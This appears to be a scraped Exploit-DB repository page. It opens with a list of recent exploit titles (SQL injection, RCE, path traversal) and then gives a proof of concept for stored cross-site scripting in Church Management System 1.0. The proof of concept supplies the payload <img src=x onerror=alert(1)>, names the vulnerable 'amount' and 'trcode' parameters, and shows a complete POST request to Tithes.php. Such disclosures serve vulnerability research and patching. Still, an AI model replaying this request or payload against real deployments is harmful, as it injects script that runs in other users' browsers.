
11 changes to exploits/shellcodes WordPress Plugin WP Learn Manager 1.1.2 - Stored Cross-Site Scripting (XSS) OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2) Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE) Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS) Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated) Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS) Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass) Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated) Simple Client Management System 1.0 - Remote Code Execution (RCE) TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated) Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE)
30 lines
No EOL
1.1 KiB
Text
30 lines
No EOL
1.1 KiB
Text
# Exploit Title: Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
|
|
# Date: 07/03/2021
|
|
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
|
|
# Vendor Homepage: https://www.sourcecodester.com
|
|
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
|
|
# Version: 1.0
|
|
# Tested on: Windows 10
|
|
|
|
# Proof of Concept :
|
|
|
|
#Payload: <img src=x onerror=alert(1)>
|
|
#Injectable parameters : amount= and trcode=
|
|
|
|
###################### REQUEST ##########################################
|
|
|
|
POST /cman/members/Tithes.php HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 85
|
|
Origin: http://localhost
|
|
Connection: close
|
|
Referer: http://localhost/cman/members/Tithes.php
|
|
Cookie: PHPSESSID=cne2l4cs96krjqpbpus7nv2sjc
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
amount=<img+src%3dx+onerror%3dalert(1)>&trcode=<img+src%3dx+onerror%3dalert(1)>&save= |